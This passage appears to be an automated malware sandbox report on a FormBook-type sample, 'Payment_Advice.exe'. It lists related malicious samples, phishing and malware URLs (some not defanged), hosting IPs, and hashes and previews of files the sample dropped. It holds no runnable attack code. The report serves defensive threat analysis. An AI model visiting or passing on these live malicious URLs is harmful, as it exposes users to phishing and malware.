                                                                                                  6hyWrD20Ho.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  PO.xlsxGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Alligator Pty Ltd Quote.docGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Lv9eznkydx.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 170.33.9.230
                                                                                                  UZOM POWER.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Af2ehGbXlD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  DHL Shipment Notification.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  DHL Shipment Notification,PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Drawing.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  TT-Bank-Slip.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
                                                                                                  Product_Samples.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 170.33.9.230
Match | Associated Sample Name / URL | Detection | Threat Name | Context
------|------------------------------|-----------|-------------|--------
SWEB-ASRU | DOGMFxuJPr.elf | malicious | Mirai | 77.222.59.244
 | https://u.to/vZehHw | malicious | Unknown | 77.222.40.36
 | 6lN7x5JqIM.exe | malicious | GuLoader | 77.222.55.34
 | G3ASZOXI97.exe | malicious | GuLoader | 77.222.55.34
 | hxxp://freddydal2%5B.%5Dtemp%5B.%5Dswtest%5B.%5Dru/AG/Pr | malicious | Unknown | 77.222.41.18
 | Nuevo_orden..exe | malicious | FormBook | 77.222.40.224
 | tpUYHAXcpu.exe | malicious | DCRat, zgRAT | 77.222.40.238
 | aZDSUPv6IlTFjIz.exe | malicious | FormBook | 77.222.61.31
 | Tpeknp6cVT.exe | malicious | DCRat | 77.222.40.105
 | ZJ79K2xku4.exe | malicious | FormBook | 77.222.40.224
 | lnk_.lnk | malicious | Unknown | 77.222.40.224
 | lnk2.lnk | malicious | Unknown | 77.222.40.224
 | wxr5X61VIQ.exe | malicious | FormBook | 77.222.40.224
 | PSBkh0tA84.exe | malicious | Unknown | 77.222.40.224
 | 8WzcyZswGR.lnk | malicious | Unknown | 77.222.40.224
 | Us8X1tgm9L.lnk | malicious | Unknown | 77.222.40.224
 | OHcBucOjYm.lnk | malicious | Unknown | 77.222.40.224
 | 5iByRdcsF8.lnk | malicious | Unknown | 77.222.40.224
 | 1AwSXilU8f.lnk | malicious | Unknown | 77.222.40.224
 | http://santandersi.com.swtest.ru/es4/ | malicious | Unknown | 77.222.40.224
BIZLAND-SDUS | Transaction_.exe | malicious | FormBook, NSISDropper | 66.96.162.129
 | Tenors.exe | malicious | FormBook, GuLoader | 66.96.162.139
 | Payment_Advise_4_10_23_pdf.exe | malicious | FormBook, NSISDropper | 66.96.162.129
 | F#U0130YAT_TALEB#U0130-SALTIKMAKINA__AS_BESTKALIP_A.S.exe | malicious | FormBook, RedLine | 66.96.162.140
 | borilpokonta2.1.exe | malicious | FormBook, NSISDropper | 66.96.162.150
 | docswiftusd.exe | malicious | FormBook | 66.96.162.129
 | https://www.dramrsaeed.com/ACHPayment/?QWNjb3VudGluZ0BhY29ybm1lZGlhLmNvbQ== | malicious | Unknown | 66.96.147.109
 | http://dev.factwatch.org/uorsuqmi.php | malicious | Unknown | 66.96.147.159
 | Fiyat_Teklif_Erymetal_A.s_MKLoO8887.exe | malicious | FormBook, RedLine | 66.96.162.140
 | DHL_-_1ST_PAYMENT_REMINDER_-_1003921407.exe | malicious | AgentTesla | 66.96.160.138
 | 48857571199.exe | malicious | AgentTesla | 66.96.160.138
 | rOmranZolal.jpg.exe | malicious | FormBook | 66.96.162.148
 | 4eX3EdJ8Q9.exe | malicious | FormBook, GuLoader | 66.96.162.139
 | z3hir.x86.elf | malicious | Mirai | 66.242.24.15
 | QbQ0spd3GB.elf | malicious | Mirai | 72.22.85.138
 | r009_depago.exe | malicious | AgentTesla | 66.96.160.138
 | IDzTyPghZg.exe | malicious | Unknown | 66.96.140.79
 | HP-3082023319.JPG.scr.exe | malicious | FormBook | 66.96.134.75
 | RFQ_HP310823048.PDF.scr.exe | malicious | FormBook | 66.96.134.75
 | z0r0.x86.elf | malicious | Mirai | 209.59.226.179
AMAZON-02US | FaO2o1dyWd.elf | malicious | Mirai | 108.140.54.16
 | qilFutAtPw.elf | malicious | Mirai | 54.104.203.171
 | e4N9QMBwUc.elf | malicious | Mirai | 108.140.54.12
 | MufQXh8vQz.elf | malicious | Mirai | 108.155.200.104
 | KKveTTgaAAsecNNaaaa.x86.elf | malicious | Mirai | 35.154.141.94
 | x86.elf | malicious | Mirai | 54.185.230.173
 | Y0MTq91T1o.elf | malicious | Mirai, RapperBot | 54.213.106.148
 | SoQWkqDw8U.elf | malicious | Mirai, RapperBot | 54.77.19.64
 | a0JDLTs0LS.elf | malicious | Mirai, RapperBot | 15.161.198.94
 | nX55skkwjy.elf | malicious | Mirai, RapperBot | 54.184.181.84
 | https://self-mst-login-mfa-365-authenticator.softr.app/ | malicious | HTMLPhisher, ReCaptcha Phish | 99.84.203.44
 | New_Order.exe | malicious | FormBook | 44.227.65.245
 | mips.elf | malicious | Mirai | 35.75.173.48
 | mpsl.elf | malicious | Mirai | 54.71.135.230
 | arm.elf | malicious | Mirai | 54.200.217.66
 | x86_64.elf | malicious | Mirai | 54.94.55.105
 | Receipt_PDF.exe | malicious | FormBook | 75.2.18.233
 | qVRo4HmVDI.exe | malicious | Unknown | 54.231.135.81
 | https://best-movie100.com/login | malicious | Unknown | 35.73.107.33
 | qVRo4HmVDI.exe | malicious | Unknown | 54.231.160.249
No context

No context
Process: C:\Users\user\Desktop\Payment_Advice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 558
Entropy (8bit): 5.594286688711777
Encrypted: false
SSDEEP: 6:mIonUiIkUQ59l7zl+pZW5p0Q3XURPw8SKJhKPIOcWPuYT4xMdDQNUQ+cWwmmLAWZ:mIoSkU05RnKVNY1RPu+4WDRbw6TIXKWR
MD5: E9AA7D410396C9C8596AA58840D98756
SHA1: E95625B7F36EBA099AB9CE5FE308BD573211316C
SHA-256: 1719A52895F2E5AE73A4E7C02161B72FA6E358E31C9FB3BB0D4CC26BB47CC9AD
SHA-512: 4435C150FE01FF449CAB5A9063F2F59CD676E656C75962413721AF818060CF3296BF46A9CD66021F31C2C5152592C772BCE9DD0B545349AEC45FA38301E54A7A
Malicious: false
Preview: 0ex6kiSx1QOpJkX6i529AEr8L47ZD3IGxc39I33wFYB55z7AHv94CN2DcFcud9K0Rl18H9od8M92T4K8Vs0E32avm0mYHd604R77uvzCn060eHG825WY3Rr9CmF07DOEKTL36PLb6t369334215aK77W78c5uo16oK80Wp4k957Jw36574b2D08ho7798p..ButtonConstants StructureConstants..O8O09HQ73H29X122g623J6X38F0718W524K783IT9ytmq54h42..StructureConstants ButtonConstants..61fY7W5364R218N0l1u81Ysd4o55nyH1KjN0No8OQ2956su7POp213x9u28..ToolTipConstants ButtonConstants..g0Tcb3h8vW7O722xL98Y02ht..FontConstants GuiDateTimePicker..228163C8057bw9SEvj86rt685lDbVZlM5T4KAU6M412705PRV5..GuiDateTimePicker ToolbarConstants..

Process: C:\Users\user\Desktop\Payment_Advice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 647
Entropy (8bit): 5.61906342900148
Encrypted: false
SSDEEP: 12:JWR12WjcmHtStjPnUFz1BPDYC6/pv92chUv//ETuDlczTAUhGR:JIn4mNSBU7VN6/J9CDlijhGR
MD5: 0D41D3B159560A4A6BA7320EAC20F1AF
SHA1: C3F27F66FF6AC48DB55606048CA97B6273238904
SHA-256: BE97500320798DEA5D65DB78CA91E3FAFBDA724E38D914058501E42BB938944A
SHA-512: BAF9E6C61E76B5473396A02AA1CEED96CF1506B99523751ECB60296C566A2D7381B106A777D7A6BEEF4481045024A7ABC6BD55C62691C3485EC574AC695DAD77
Malicious: false
Preview: Q6poU43K69421..ComboConstants StructureConstants..FY2291BM916S9DS7nSaOcr0djvk0994S..GuiDateTimePicker UpDownConstants..96Qla26u38x9qRQsGje1n0CP3lZe1546B23E9n214a7Q0raB0Wq54e438cw6A..GuiDateTimePicker TreeViewConstants..u24730iMr7IAVz21xK3695368F8261yb..ComboConstants TreeViewConstants..56ZJ7U8jGee4mbh2C1707383UUA95h1084..ToolTipConstants ButtonConstants..23oQI032OZ1KdPuzJ6f4Nv0488sn3v0SL8ig2vb..ToolbarConstants GuiDateTimePicker..HYjqq7rR5f1aJ7107B87Wv4ZxB45O092KJ6EQ22446K2u27zt11jiQ21VXQ9xM1uB6Ms55CJ21azSZRe6gC66WmtbHHf5rnU27Q4f7KT97OAi489cNP61M9NIBC0X34eb43x7SkV2aFC9jzmM080Rhx18X0Yi4P9Gu53sOFTNT23657oLA..ComboConstants ToolbarConstants..

Process: C:\Users\user\Desktop\Payment_Advice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 502
Entropy (8bit): 5.503592619825736
Encrypted: false
SSDEEP: 6:4TZyHS3cGfxVXW7so36hoDR9WoOkSSBSc6d6alGEM+uhrByzNRzaFaaiQeILE0wt:EyyMQxQQoC6SSBPoBuhUNeabWNlhLQIy
MD5: 5880F05CF40446DAB207E3D4473A203C
SHA1: 0554DDA8A38090E414F79E851AA94D37365D2F5D
SHA-256: F88FF674F376E3E9A21F30B7D4FDA9F200805C6ED269D2F6E74A417E6CBA1BC4
SHA-512: 02EED56E44BF4B18012B8B3E506A14E5E28093A5D3C0E2C054B96C89D5E2F10AC989D50C57DFD2185C0F7F7F843252EA011B323DFB95E3C761F83635FB601310
Malicious: false
Preview: 2P2w865Nb7WI8P154Xh2G77TH818i7R2EJ0fO1a191547PJY0351ZH3w94671460Sj89a67724fBstSJj..ToolTipConstants ToolbarConstants..7w84V6165ka12jE33jINLM8yy4023y36f692BOk867l1449YZ33FMyQ6xcglIy57i3e672162zU8xgVI895311wn40..FontConstants TreeViewConstants..b7C432Z56A11432x319kE44Qmi78O373f90ZOX7CN5iV7I116zp6g8aBsk73t4332..BorderConstants UpDownConstants..75530R2bkM69YMg39H0fgn4c4yFAR000OS9381190c13466f14rDJUZ5jiB9q2tNl57qpIL09HMl75e9331ey2944738X2ig05i04N2bQj19R58b90DV435c39..StructureConstants ColorConstants..

Process: C:\Users\user\Desktop\Payment_Advice.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 640
Entropy (8bit): 5.548271292480302
Encrypted: false
SSDEEP: 12:LuePHNvU8AQXqKBsKDNgUrRCezNuS9tvOrtuAMiSLOHYGUryv:KKuKBsKDaoFzNzmttR4GUuv
MD5: CB052098948DDD8616BB19E8060CED5F
SHA1: E493E1BAD46F48D8820562C3C447D24AF48A9D31
SHA-256: 652A73340D55098155A5917399DD0680767405CF476B9846DE1AE376BD41C9AC
SHA-512: 629EE09986F935A57E0BDB52F20B79238A090152A224617A1CE9D6ED06FE8A293D92989A9E85892DDECB718BE50D19A07848C89A3EA2B7BEE7DD86774CB5C98D
Malicious: false
Preview: 63hqi6913KU0QnK012Aasr3eb3y2EWJ..ToolTipConstants FileConstants..40w5MA4D9s96e9X14B0hp5JZi46g61U06e03A2Kh9X3eY5x8G1YGw748E5..GuiDateTimePicker ComboConstants..T0bquzC650P8lkG5M983q4S9f5omc78B0XU7O0rI91m5v51343008w5QK8f0566E0696473v4qPv..ColorConstants FontConstants..l4m9R3b75275O646RQn7Zf7rnQ1i5bCq..ColorConstants StructureConstants..9j4kk8yf3tnWS6MFSfFvr4lEuB90x1b08oKF08he6692Wx84ln73mly5V9Y0V92Bui285T209705..ColorConstants ComboConstants..qk2R2Z29g90nzDQ7P8342z16fvFt82743K3a8h789H56p19T9n68w9G19o69Y489fr4469p23156OQ56n1938t550q74z8039Noa52Bev9087bJmyP1ysJg5Gwt2H1cmW3B8dx17547r87Q2s43pvS1s1NY4k..ToolTipConstants GuiDateTimePicker..

Process: C:\Users\user\Desktop\Payment_Advice.exe
File Type: ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):568
                                                                                                  Entropy (8bit):5.621125993621674
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:crabMuMc55DIoCsyHGRixx5ZJ1Mnss8nR/qv:cr6X5hIFVHGAxLZ/HR/qv
                                                                                                  MD5:86BE2C8245ECFDE264E8F8CBA449C316
                                                                                                  SHA1:B3241A041D1201070CFECD78EFE2FE74DB38FD72
                                                                                                  SHA-256:AB5918BD84083253B56251E2B322D0B785E55C3804243D558C5FE1EFAD969257
                                                                                                  SHA-512:5E63FFFB4030FB1158BC7C35B3564293F6410AF538362605853CE8F1F8C2DF8BD7FDCC0926B77E18CF6FCD25548305D49BFFD0B79E93AEA2DA2F27EEE633E795
                                                                                                  Malicious:false
                                                                                                  Preview:8V0Nq8SA8uLXGN74s650z2Q9XI3Bll6040mdS8w99GL10K7959v526q6L39d5j51h7v54I8NR06S1U65DzM76K4aho09Sjm01u954dbe496WAc98GeocsHH9x12s1629s0VB6F829cbkA9it5E0CZf82K92ZW4xC1n45z359g6aS278H..ComboConstants UpDownConstants..d98lKHA0ElXR717945X7037z..UpDownConstants DateTimeConstants..4MTU20y30HC8RfyL6GwvC8O673sAY7S2ky85QQP3P5nzr43Zgk91DW7e0dJ53fx15b7hp03AMM15iCj9D65tTG19m3iS3o57nqb5e2nWmIB57c55P8..ToolTipConstants ToolTipConstants..u3z13b61mZ6709LHFA781rF1v11zlM7s9x86nz4703O975q7y198h6xs354y8U9a99w5Y99tn615EWS5w1ef324C2405n8AO2vaNS18P29..StructureConstants GuiDateTimePicker..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):605
                                                                                                  Entropy (8bit):5.512426333253525
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:UjOxsHW9zPOs4IT0jPVvmq6TmIr0fHR5TJbxWxTPrBPc:UMsHWss44q6v0ZRbWxvO
                                                                                                  MD5:C4E6A2B1AC8F587799889AAADD43F3DC
                                                                                                  SHA1:CC416BCED5E5EDFDF35AC5D565BED457BD079858
                                                                                                  SHA-256:BD3B9CB01609C7B2BDAE91BEE91F08B52999842A62C03E93E87701347B4C2900
                                                                                                  SHA-512:7CC8E9C6DE859C8C1A2FB7CB2C7D0242215350CDAF25EC0FC3CEA630B07A74BCD82532AAAD3E2783B6B222B6E4FBD15C15501F8483E64A63A6E0961029046AC6
                                                                                                  Malicious:false
                                                                                                  Preview:iXQ4bQ56p9g9o7FCy356UiX7tyP96071CrVmYF678SCL49jVa579mn68jW4hqY63Eq3S..ToolTipConstants ComboConstants..Hd8NP60g333RrH4gmI2d3uee1FNvDb17rJ8kP073i05nX9hlS9Dp452pEA0m..TreeViewConstants DateTimeConstants..K44YK9R6Rut57DY918Oj..UpDownConstants ToolTipConstants..06E554j6975V3NjKoA66JYH408w84e1dd8X1078o2M..TreeViewConstants ButtonConstants..2L30Xi66PbLHP5fRB1J990G81K8RBA..StructureConstants GuiDateTimePicker..Kx763w089m9aA410xi16p93EDTY6Y600582..StructureConstants UpDownConstants..P9y4N0CO0uS5301D8a0dn8094gRwn6VmJL3B05fz4U281bR1t33365m392n540OAf313bi8o2s32a2PKh5s8Ea..TreeViewConstants TreeViewConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):583
                                                                                                  Entropy (8bit):5.521835187955731
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Seztdt1wrLBR8qKy7F7bESr+SH4PNFJRWD9ji:SeZdyR7H7F77r+LP3JsD9ji
                                                                                                  MD5:298825CC069C8C0D77B3CEF17A268607
                                                                                                  SHA1:0465A8F768444667914B1082EBDFFE1890876041
                                                                                                  SHA-256:E394D04E62AB5FF0394BB529E74CC2977ABAC079ACED67C911B4382FFE0CBDCC
                                                                                                  SHA-512:76D916AB86239D4CE1EE8253E3AF24E8B357DE9ED45E99D81EB194B03484376423F7B98CFA7B80DB356E9CA45F11CCB953F86347D199BD8F6B6E96880BB6BC25
                                                                                                  Malicious:false
                                                                                                  Preview:T34742jnO4v3W51jpEm8i35045e3AU38..ColorConstants ToolbarConstants..647VBL7jQ787C2CWz40P43sZ790z51AL1K6N71Z45ot11Ym4V0..ComboConstants FileConstants..09g6R61P30Y29sKM2080D4du832vCN47W1H6O1CKG5A2I193Wg23n79215rR246A4rp61Qtt6U349w9v907HT390uZ3k66wJGtJl3272p2a5X5i89s05206BS..ToolbarConstants ToolbarConstants..6n98q70j1847rJ7OzZoNa3757NXmaVf7O1F67Z8xtSY80Fi9E599hW1YQiRK871w7z0y4B12t4C73i8cj2zSEN02556E2qrjPw9nSy17p9p071x9sET8196go381YvBx098GO8X8R949Pt6F0U..BorderConstants ComboConstants..3Rj9371v3y55LibK39HjIHQ144R509Rih10tJbUsddA1Z1773aU1XvzPvbU1..BorderConstants ToolTipConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):947288
                                                                                                  Entropy (8bit):6.628970444797039
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24576:2YgAon+KfqNbXD2XJ2PH1ddATgs/u2kanpel:237+KSbq5e1diEnHanC
                                                                                                  MD5:874798CB576E238642281B10189B031C
                                                                                                  SHA1:EAFB30E710D557918533A6F10F09CA1F4227C77E
                                                                                                  SHA-256:E24858235AF8C85AED95375BE6DEA083C7910917F78731EF4D195799E6F49713
                                                                                                  SHA-512:EAA0CFF408FD3366813F1A80CF866BD590A885984A525D4A1B07FDF21C2D6DF07C98FD0782050539F912A93B7DF6A5A8831B676CB6200592995F108CB2659B92
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@.................................4y....@...@.......@.........................|....P...............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):129401244
                                                                                                  Entropy (8bit):6.997845645181215
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:CaHjJ9Tq7EiLVrwGCflkxz8IOyfKFQ6WO5DxyuyzeLJs0G81gqURgEjnWF0Dv9vw:v
                                                                                                  MD5:FDB81B6D062F3C3065421D6A19F0BC68
                                                                                                  SHA1:011E0353FFFB0BD69D8C120423FF406AEB4E3C9F
                                                                                                  SHA-256:6A526324979F1736853806330C22AE6B67C62694784796DDE4656AC933860B30
                                                                                                  SHA-512:BF12C2AED8E87CF548D6AE589EC3980BA74273CF949FA887CD678D4DA0A92BDA17536D0F2720701548A4D30478474C31C5EB45A878BD8D88F94EDA5ECF732951
                                                                                                  Malicious:false
                                                                                                  Preview:..;..Yb.5..`................8....A.....e.b....jP...?K..(E..C;.p.I....#.c.s...Z.../..'....yq....UI...J..8ZH..z......I....L....v.$..|.+.....%.).....z.s..Xt.0...[.`.1)....BMO`..+.B....D(U.gT..h^a..(.....p.).z.DXV.=..0.J.i...7z...^.L.1.V.......W..w.&*.^.j.6.7....]......Ax..z..B......&W`.f.....ks..}.9#.]0rc.W...../4.._"aO..-..*vT.k....j.2.1.S.5.1.2.W.4.2.D.7.5.9.2.7.0.8.0.3.T.5.....R...c|..=.'..>.U....f.'..........!`.d.._c.j....;........g...f..9).wH.Y..4.!Xk.R.._bs..8Z.....y[.mk.G|...I|8..b..r..Z.+.5..Z#.....%Se....8t+...y...A_.(....-.....T..u....XeG....+].H.iZ.d.....9)....:.).i+.......S.y...O..KY...r..J.N..#m...p\.....h_..%.........J.5.5.p.1.8.E.0.8.e.3.a.6.V.2.1.l.3.5.I.2.q.2.G.6.1.q.....2.R.0.7.6.O.o.v.1.7.2.1.k.q.0.F.B.9.5.7.4.9.m.v.j.q.t.5.8.9.2.w.8.3.D.d.a.U.J.9.9.7.....6.R.1.J.0.4.l.4.b.5.3.N.2.J.F.4.8.T.F.i.r.1.w.U.G.9.2.s.3.U.3......W3>...C......C.....*...$U....y0.e..~.m.f....R..:.....L.7>/..{(.z.X.*=.'D........^....g...&.w2.....+R..NXf..?.....rv..R...
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):611
                                                                                                  Entropy (8bit):5.592426455491853
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:2tJ0otGLpS0EwA2bRMetIQR5p4T6qk7V8jqPR2MbO:2tpsLM23BRj4T5k7V8jqPR2MbO
                                                                                                  MD5:3ED04884C6BA18C7D7AE47E544EB4935
                                                                                                  SHA1:43B3EB018F5646DB3AA6FD63843F34BC1332B3AF
                                                                                                  SHA-256:DEBFFC1C5EFC823266EB30DC866E6D9487CC8848C5BE4C978469F44DAE4B6215
                                                                                                  SHA-512:843C2D41F8A4D90DE48494876BF8CEDC165CFD44D488271086BF1B8C99E32A117A07CBFCC3689E2A028A10241876E5E1E00C63FB3397C0428CFC39BE70712152
                                                                                                  Malicious:false
                                                                                                  Preview:812tqM02BBb620ED97JMbz8hIAxQk6x61X6E2aQ14uoDCH286D34..GuiDateTimePicker StructureConstants..c63d02N60iGuGGL049PHg73k524T19yLu9519rM4Crrg03k22v04HK46ah47Z2v0bFYH81F91p13uTpHb6H4081g7T358wCUCUN19f5Oz49ApyHPTBM8f56Ko34f80157..ColorConstants StructureConstants..99H4F19O419FG140M9bK604SF9U2P75XwO33092aC12750c6SL13X6v0kr5p5001379714lFKv31G001ZC3189uC862fI3Pws3G9ezC3D2uf24..ComboConstants BorderConstants..2327w2Ew0GkJ5s1054N74s9822nzk1w0f86E5gD4hvq73B93T6o5281v87qxCHT686uidGX9hOdF9Bx4x5qEZ1xZeOwlZ2oq2DP1SR463rX6n4B92Z7jQ155N8m0h09aChBs1476D10Wyp31232FI7Z15roxyy7titAD277O6Z351U..BorderConstants UpDownConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):539
                                                                                                  Entropy (8bit):5.411023292344512
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:MphCZOo9IxqcdbUYCce3LuDad/koKAVjPUnPJ:khCZOotiUYZe3bdsnPJ
                                                                                                  MD5:E53124CBA0080118B62112D53EDCAD06
                                                                                                  SHA1:DE670B056B989E4252320B157F1D159360177CD2
                                                                                                  SHA-256:C9ADFF9C39AACB160760C6A08C741BD0863C5CF381ADCCAF750D68795BAB56A9
                                                                                                  SHA-512:3E34CB946C85DDBE98D51E7F5776F30CEF125C4396E0C96A3055E713A4B4B157864FC0A4CBC848B423B047DEE27729E595DC30FFB4133904A8A8D26843EF0B7F
                                                                                                  Malicious:false
                                                                                                  Preview:2651gP9R49QyjXLfrJ3q11DOF97S95QliH5V4xeys6f75L0OE02E371737i670Yn829u4ljs6R7O..ColorConstants ButtonConstants..88Fv10MK6k54WqP130931YMg0904C7K99w0079cryT9rRERv7SY1n0yU1PP4l11IL5kdt9aRQ418930yLEm105198s0yW3I34Vs81GumyRD1mSP..ComboConstants ComboConstants..63T0GehwZwPlO0496786f41801hoB7q8N15..FontConstants ToolbarConstants..V50l11WGR446R3gK024u164Xd1f9s8..ToolTipConstants ComboConstants..8dhZ7NpvdX..TreeViewConstants FileConstants..92iO90..ColorConstants ToolTipConstants..b5G0e2Q62q7W16Y1ZVZ12S26q5N95j8h..ButtonConstants FontConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):506
                                                                                                  Entropy (8bit):5.5820505867333665
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:om7/i2MWbbRY6W5mFTnV84PRCUKSgp2lBPqC3xV:b/iQpW0pV84PGXMllz
                                                                                                  MD5:5334AA86CDA7C39F4D28B6D9DCEBA01F
                                                                                                  SHA1:BD3F72AC2067661B78F6AED54238C7C920166C56
                                                                                                  SHA-256:D9B68B7C153C5EBF44DD7689A6DA8535593F8D3AC3F50A35B35BBF9D6A5F34FC
                                                                                                  SHA-512:17E90A1653AEB3FCA99EE6BE7E2DAB8484479136FB0EA1EF095081D5F62448933A69319880741C3B303A7D9300E1BCFE8749165DF1D56D0574EADC3E83381BE2
                                                                                                  Malicious:false
                                                                                                  Preview:GGQL71HU69sx4Z5858PGeo7x31dqXUM9y1YG47kEuc86hT3U7PUyCZQw3083Q1Yj0P5ns6zu2u7k4TN63gw49j494if3x5463r3dZpoQrT18vCNH0e9yC604X4G45DJ77ANe9j1sG555gOSYZ725E4Ek5o9vYG3W98daf..ButtonConstants BorderConstants..89s8Q6ryt08842wSKe357AZhj29xq4176sCW65v856GTke..ToolbarConstants ComboConstants..tV08G55R4fi55YL645J1JQ1FA22QCM4t74S54W67b099Rrl29MUAcJ702zA45uS6Yd3E74304M762Y555j33dU69n63W11gxAX5dXF3Si911680326i1b7M6r506v2sO285FKPcOeY3p401X..BorderConstants TreeViewConstants..8eYA3Afb45..ToolTipConstants FileConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):532
                                                                                                  Entropy (8bit):5.588002874192617
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:mKbzHA7t88LPB3Qofpfu8WG7ZXOH2ZvSBkUACJ:3zS8kJ3QEm8WyOH2ZuLnJ
                                                                                                  MD5:FC6751A96DB0F04AD7460ED080C059D4
                                                                                                  SHA1:BD304F75749E998E477545D054B6A5E0A42D6D75
                                                                                                  SHA-256:16F19BCBAD465D326732F197511E09129435DB0F9592F88A04030AE302F3796D
                                                                                                  SHA-512:78D3C96588277EDE7A28CCBF6A67F93A37B9711696648BA73CE673BD22611274F1CA167E6087BF0A81912D5AE9E593414360F80847D6695151A7333C7FBD2FC1
                                                                                                  Malicious:false
                                                                                                  Preview:r5ioW35wBV6tF05Zl40A3l7j1UD41P0Lym6P4oEU4e1iAUUG086586486MkAL9820IT4n7280b9r4gL3615Q2xUBIVt2WsIc1723z428iMo1R..ToolTipConstants GuiDateTimePicker..D71sYJ1O4n2LxXXeE1193I7Kc8Q3235435U6b93730Kb9M8v87902032u8DcxCX9883STH9uj3UX74N9CQE2S7J6GRDD6DTz8Od131m8jYG..ToolbarConstants ButtonConstants..8h3NtNBO0t1103f63Hw2DXP8IV3857eKMDk38BX2R39j66GP706n2H47n975A9v42u..GuiDateTimePicker FontConstants..553OX5ukS7604W8Y4..StructureConstants ToolbarConstants..79z1383i6MmdT1L89NYp9ER9ZR9g7ZO769yT7m1Uo5If75M09222..ButtonConstants FontConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):579
                                                                                                  Entropy (8bit):5.52127768114709
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:vDDTTwe6VMwQRrBPqy0iJo8MsB7jfdpfGPXSd81t:vvTTB6ARrt0inBjfdeXSy
                                                                                                  MD5:57ABDACE3D1C2BF7CDE0E8668819E603
                                                                                                  SHA1:A7E152F95D018002A006F599ACB8ADB111A33304
                                                                                                  SHA-256:23A712EE2EA7101B19DF73B99511985C8392CB43A78D9D89E91AD5818E51C3D4
                                                                                                  SHA-512:96D48B46EE7C31BA19DBA3209B20A5C5849440E109C08C504DBFA223CF2F9174C15AF8389E401823C3467F765ED205D9895D995E711B5EBB4897D7009A70D6FB
                                                                                                  Malicious:false
                                                                                                  Preview:84Dp49rI2Q5Li4h4Msysh9827Vx0ulb27008Z2281Sv98MD43m9e75oqeaDEgykLE73947c1..ToolTipConstants FontConstants..M2P8FGK34PjCrM12u1417Se6Q6371526DafNE005421tlN0C15z7lK7E9i047h2663..StructureConstants TreeViewConstants..PM9O82Zoz6gm45GN8187907U..FontConstants FontConstants..uI887NLtdB694mwiE57j35053lg766PUm007y6FZ27Cr3ry2Z2Du8V13L74zNGh133OJ56N6zUSMvTUaH3CW23gqr0943s..UpDownConstants ToolbarConstants..w203963L4V9txH97T4x4nA1Ob5on9R01G4d3j346fVXR0604M8l7950HW1D5E7OvjhvtE4s2Of5S53bbZ5490brmv7M8FaZ3T38oY1t482161962acCJ54Wf7x8703j4i7N275nw5QC77LTs21O1R..FontConstants ButtonConstants..
                                                                                                  Process:C:\Users\user\Desktop\Payment_Advice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):564
                                                                                                  Entropy (8bit):5.5418882465749055
                                                                                                  Encrypted:false
